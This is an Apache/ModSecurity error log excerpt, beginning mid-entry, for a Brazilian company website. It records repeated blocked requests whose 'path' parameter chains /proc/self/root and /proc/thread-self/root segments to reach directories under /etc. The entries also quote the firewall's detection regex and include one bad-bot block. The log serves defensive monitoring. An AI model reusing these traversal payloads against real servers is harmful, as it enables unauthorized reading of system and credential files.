"/"] [unique_id "abuna_-YZRR_7pZ7nDJaXwAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:36:13.051574 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.241.31:43482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunbF_V7PWP6ixUYl6JeAAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:36:17.892257 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:43488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunceoXxyEfFpUF8f_d3gAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:36:23.186820 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:60948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abund-yqAr6etmhZHNoxJQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:24.547287 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:36748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuneMdf6f5d65gmYZRAkQAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:25.640426 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.241.31:59132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuneV_V7PWP6ixUYl6JhQAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:27.707974 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.243.128:36756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abune1_V7PWP6ixUYl6JiAAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:29.510971 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:36760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunfda6ubjKNq_cu4YOswAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:32.015556 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:59140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abungAkwaGbbGflqUZCCHAAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:36:32.494004 2026] [mime_magic:error] [pid 27293:tid 140411741927168] (70014)End of file found: [client 57.141.18.32:50968] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 04:36:33.079243 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:49834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abungda6ubjKNq_cu4YOtwAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:34.502766 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:49842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunguoXxyEfFpUF8f_d6wAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:36.950466 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.243.128:49858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunhBkFeYa1D6dYQnC7NAAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:38.326888 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:49874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunhuyqAr6etmhZHNoxJwAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:42.080357 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:52080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuniuoXxyEfFpUF8f_d-QAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:45.247063 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:52092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunjda6ubjKNq_cu4YOvAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:50.265336 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:52100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunkv-YZRR_7pZ7nDJahQAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:36:53.036015 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.243.128:46710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunlV_V7PWP6ixUYl6JmAAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:37:11.470585 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:46720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunp_u8EFLIOrSqIptrIQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:37:12.143039 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.244.43:40244] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abunqP-YZRR_7pZ7nDJanQAAA8I"]
[Thu Mar 19 04:37:12.802361 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:45208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunqOyqAr6etmhZHNoxRQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:37:14.123356 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.243.128:45216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunql_V7PWP6ixUYl6JpwAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:37:18.838433 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.243.128:45222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunrv-YZRR_7pZ7nDJaqwAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:37:20.190486 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.243.128:44070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunsF_V7PWP6ixUYl6JrgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:37:21.570045 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:44080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abunsfu8EFLIOrSqIptrJgAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
